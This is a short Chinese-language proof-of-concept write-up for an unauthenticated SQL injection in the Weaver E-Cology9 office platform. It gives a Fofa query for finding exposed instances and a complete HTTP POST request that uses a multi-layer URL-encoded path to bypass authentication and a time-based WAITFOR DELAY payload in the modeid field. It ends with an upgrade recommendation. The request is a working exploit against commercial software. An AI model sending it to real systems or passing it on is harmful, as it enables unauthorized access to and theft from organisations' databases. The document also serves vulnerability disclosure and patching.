0x01 产品描述:
泛微E-Cology9是泛微网络科技股份有限公司推出的一款面向中大型组织的协同办公平台,旨在为组织创建高效、协同的办公环境。E-Cology9依托全新的设计理念和管理思想,通过智能化、平台化和全程电子化的特点,满足组织内部的沟通、协助、知识分享和流程执行等需求。
0x02 漏洞描述:
由于泛微E-Cology9 weaver.formmode.servelt.QRcodeBuildAction接口未对用户传入的数据进行严格的校验和过滤,导致攻击者利用多层编码的方式绕过身份认证进行SQL注入,未经身份验证的远程攻击者可以利用 SQL 注入漏洞获取数据库中的信息。
0x03 影响版本:
泛微E-Cology < 10.70
0x04 搜索语句:
Fofa:app="泛微-OA(e-cology)"
0x05 漏洞复现:
这里body数据需要做到一次请求更新一次,否则系统不会读取modeid中数据
POST /weaver/weaver.formmode.servelt.QRcodeBuildAction/login/LoginSSO.%25%36%61%25%37%33%25%37%30 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.5672.127 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Connection: closemodeid=123+WAITFOR+DELAY+'0%3a0%3a5'
0x06 修复建议:
针对此漏洞,官方已经发布了漏洞修复版本,请立即更新到安全版本:
泛微E-Cology>=10.70
下载链接:
https://www.weaver.com.cn/cs/securityDownload.asp#